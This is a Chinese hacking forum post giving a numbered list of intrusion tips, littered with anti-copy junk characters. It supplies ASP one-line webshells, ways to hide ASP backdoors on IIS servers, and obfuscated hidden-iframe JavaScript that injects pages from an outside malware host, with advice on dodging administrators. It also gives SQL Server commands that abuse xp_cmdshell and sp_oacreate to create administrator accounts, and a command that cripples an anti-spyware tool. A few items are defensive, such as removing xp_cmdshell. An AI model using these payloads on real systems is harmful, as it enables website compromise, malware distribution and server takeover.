3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!* s5 G2 h/ o) E0 }* s/ L( n' u

3 i+ h" |0 C1 \: i- p51、log备份时的一句话木马:# D$ t3 S$ m1 ]* V: M
a).<%%25Execute(request("go"))%%25>
3 C1 b; b( L$ V- ^b).<%Execute(request("go"))%>/ Y3 R* A7 L! B
c).%><%execute request("go")%><%
3 e, _; q# ~6 h( u, Ad).<script language=VBScript runat=server>execute request("sb")</Script>2 n: h8 G* b+ ?6 _8 d
e).<%25Execute(request("l"))%25>' l9 `7 ]/ U: w' K  a; e1 N6 p& l
f).<%if request("cmd")<>"" then execute request("pass")%>
7 W- U* r/ G( t' u2 I0 d) E0 }) U% @
52、at "12:17" /interactive cmd5 L) S% u& B  ~) [7 x5 z: ^
执行后可以用AT命令查看新加的任务
! N. o1 q/ D( v2 @' b. M8 b8 L6 Y& i用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
# c% O( K' }$ p0 @0 Y6 n! M+ w5 D* K2 o- j
53、隐藏ASP后门的两种方法
2 [7 I+ a) b! f2 a. D0 E7 }9 Y1、建立非标准目录:mkdir images..\( I, r7 w: ?/ q1 s! S
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp' }% F7 ~1 b5 H8 G( @
通过web访问ASP木马:http://ip/images../news.asp?action=login
' \$ d+ B9 o( r' D1 P3 J如何删除非标准目录:rmdir images..\ /s( C& j3 @6 N* D9 H. k
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:8 a' S% w. s) H# w  }& |
mkdir programme.asp
5 P; f. I- R1 u$ C$ H  I6 {9 c新建1.txt文件内容:<!--#include file=”12.jpg”-->
5 U+ K# D+ `5 O! O  p1 @新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
, z; I6 `: p6 D. @4 Qattrib +H +S programme.asp( v( G" B0 I$ h4 d$ w( D
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
! }6 ^' H7 Z3 Q! a- f
$ j9 z1 ~  z4 d  r( r- L54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。& B3 d1 y; K' V5 @' f: Q) O2 ^$ C
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。" N$ t& M7 y9 o6 Q8 z- M+ p

2 l* o7 C2 Q0 w; a% f2 Y7 {4 a7 G55、JS隐蔽挂马
+ S) t& E4 K8 ~6 ]1.
3 F& `: S* \) C5 h) I8 ~8 Lvar tr4c3="<iframe src=ht";
0 g* b4 H  n% k& W5 {8 rtr4c3 = tr4c3+"tp:/";# m3 ?/ V- Y# q$ c9 r
tr4c3 = tr4c3+"/ww";* R/ i/ j6 l  B6 Y6 f
tr4c3 = tr4c3+"w.tr4";
* e: R/ V0 x: G9 _) [* V% X9 k6 J: k6 Otr4c3 = tr4c3+"c3.com/inc/m";
0 `- ^. f) r0 |. _' Btr4c3 = tr4c3+"m.htm style="display:none"></i";
, T; d( e' H: _7 c6 |2 x; btr4c3 =tr4c3+"frame>'";
1 j8 C) |/ L# a2 c: i. a4 odocument.write(tr4c3);( w6 u0 R3 ^4 `3 L
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
/ u+ H1 W( _* b1 r3 z- n; \. R* S8 U
2.# b$ }, e; U9 G* k6 c( y3 J5 \
转换进制,然后用EVAL执行。如
$ {& ~, O- m" `. L) k- h2 `eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
7 q# Y# H" F8 n9 S" y8 d3 }不过这个有点显眼。7 d) ?  |% b# I0 W
3.
& R& p( U/ w: l$ ^+ i0 L+ mdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
$ b6 Y+ U& w, {! _2 }最后一点,别忘了把文件的时间也修改下。1 {8 ~& f% m, ]9 Q1 S

* h/ X! F) o8 T$ {$ [/ ~56.3389终端入侵常用DOS命令
& c1 s7 [4 I5 ttaskkill taskkill /PID 1248 /t
+ b3 _, {- E1 B) u  Y9 G# V
' M# T8 {; T3 _tasklist 查进程
/ e8 a" Q! y) K4 _$ K6 u7 {. U+ n" H' B
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限& O, ^5 S  ?4 [
iisreset /reboot+ [6 V: g; Y: d8 y2 V. S1 ^+ V
tsshutdn /reboot /delay:1    重起服务器
1 H) b. p' ?* C+ P: N2 P+ ?
9 c. q. o, O5 Z4 j. N$ L5 flogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
* ^" n* ]( y- Y. q: j$ \
( L  d; F" H5 g: n5 e0 H. ?query user 查看当前终端用户在线情况
$ i, b' s7 ?; f. w# l3 {
% j, k" A' A- ^# @1 A要显示有关所有会话使用的进程的信息,请键入:query process *4 w- d! u) L% r6 C

8 y& ?3 W! U6 L3 c- Q1 t2 m7 W要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2( J0 Y* w2 I: ^0 g8 Z+ ^

4 G  h  m% N4 N7 s  K4 o0 J2 x要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
/ Q. T0 ^% r& J% q: [( D, Y" Y! i2 L2 g& t% y, v* `
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02! a' j. j+ A9 m* |" @

) c; _, r9 h/ M, N! i3 k命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启# H- ]; J+ N( r' x) e
5 ?. J/ [4 x# [0 Z
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统6 e& K* n# c) c2 q* ~( N
' [4 ^% h( G/ F+ b- W: M
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
, w9 \# G& i" k2 Q; C- y2 p( G  B( S( C8 `
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
6 {1 u( Z! Z  c% N6 d% L3 q- i7 P  [9 {: \" o2 K! I+ I
56、在地址栏或按Ctrl+O,输入:1 a  t8 f: L, Z8 B* y+ d7 U$ Y; T% s
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
$ h/ y4 `4 _0 d5 g  E; \3 m6 Y( e; S  R$ h
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。) Y+ V3 ]( b) k7 c) h

: C5 L" n6 c* p4 p57、net user的时候,是不能显示加$的用户,但是如果不处理的话," d7 w; i5 B, h+ ]
用net localgroup administrators是可以看到管理组下,加了$的用户的。+ {' ~* O! f9 G7 _
$ W) b9 h8 ^7 [/ B! d
58、 sa弱口令相关命令+ L" }: D6 a9 b; x) I

& B3 z* c5 f# u  f% e) y( Q1 H一.更改sa口令方法:; B; V& z. A- ~, d' z
用sql综合利用工具连接后,执行命令:- @! m$ ~8 a  T2 P
exec sp_password NULL,'20001001','sa'
8 l' _$ p; Y& r, h% G# q(提示:慎用!)* L# r6 h% {2 p* b' _4 ]0 q* y

$ G( u+ `8 [( S' r& P8 \7 d4 b4 `1 b二.简单修补sa弱口令.. B+ ^5 J/ a' N) c
8 y# }- x6 N* ^' v! k' e5 B
方法1:查询分离器连接后执行:# n/ D8 h% x: L& N
if exists (select * from  `9 p$ q$ }1 \; [0 \2 ?
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and6 m; ~; @' t: s, {2 {5 _
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
: i% M( ^) Z! I: Z) p8 z) m& Y- l8 x
% O* e2 r* f. M' ], B- Dexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
/ ^5 F, [. ]: L$ }# ]$ e0 i1 c8 ^3 U4 _) q8 E- G; M
GO
* k) d. a( {' \5 S9 R) Z3 ?0 D9 H3 F9 _3 {$ ]) r! k
然后按F5键命令执行完毕$ \+ Q0 j$ @0 }0 W+ m: [" i
6 A/ d7 V& m0 ^
方法2:查询分离器连接后, }! b+ T% u* c$ I4 d
第一步执行:use master
, L  T0 E) p; J2 b: `/ v# O2 n+ Y+ e第二步执行:sp_dropextendedproc 'xp_cmdshell'1 `: N( p, t& b( n" Z  B; z
然后按F5键命令执行完毕  g7 _1 d- `' t: b

6 Q( }& D; F$ `0 j& I! e) C$ ?6 h* t7 _
三.常见情况恢复执行xp_cmdshell.) O* m8 A, r# I5 @
6 p2 j3 Z5 T$ K9 C1 k! \
% ]( U5 H" G! J
1 未能找到存储过程'master..xpcmdshell'.3 `# y, j# [! U7 X, I
   恢复方法:查询分离器连接后,0 G$ V$ s* o) c; z
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int  q& B1 ^1 F- K6 v7 }7 M
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
+ v/ S* r- k$ V/ H2 n3 r" ^( P然后按F5键命令执行完毕4 W6 c+ H( U/ _7 _& s9 S  o! h9 ~# x! A
' h6 }: N- T3 S  A; X
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)4 C- b% z8 [- t# v$ R
恢复方法:查询分离器连接后,
3 K, J7 T  i9 j, a" i第一步执行:sp_dropextendedproc "xp_cmdshell"
  `( o; w1 ?% l* E' t6 C第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
$ G! C' x+ _( r8 v3 E. g: F然后按F5键命令执行完毕# g8 j. O- S+ D9 r; w! n5 l2 K1 n" ^

) [+ v8 _+ U4 w& _- A3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)8 G, a" Q  I) c4 `1 j" D
恢复方法:查询分离器连接后,. g) D6 e# T' W6 Z, Z& g( I% ]) j
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
& i2 e$ s% X* C/ \' q第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           , u' V( D3 z* J1 l+ V3 Q: O
然后按F5键命令执行完毕
, N  c0 x: ~; f, S; S
) M  K- O2 F5 d' N$ c; P2 [四.终极方法.
* }1 p0 V- s; N1 ?. T, Q如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:( p! ^9 l; i9 D; X# }6 S
查询分离器连接后,
' u" S4 f+ R: H" C4 E2000servser系统:
+ F/ Q4 Q, C2 v4 m$ O  odeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'- M( B8 l1 a! i  D' `! \" B

0 M3 q! c5 n1 r, t; v3 Ydeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'/ t' u( p4 m) ]3 N0 |" k% o

1 ]' I, K* c- ]$ V* b6 b5 \+ H, @5 wxp或2003server系统:7 p. E/ R3 T% i& W* A
  S% O; {% @6 ^
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
* @0 v6 A9 X5 w" r9 r9 A$ [( P. l% }. m5 D
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'8 k4 e' Z6 U6 @9 T- e% D) p
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表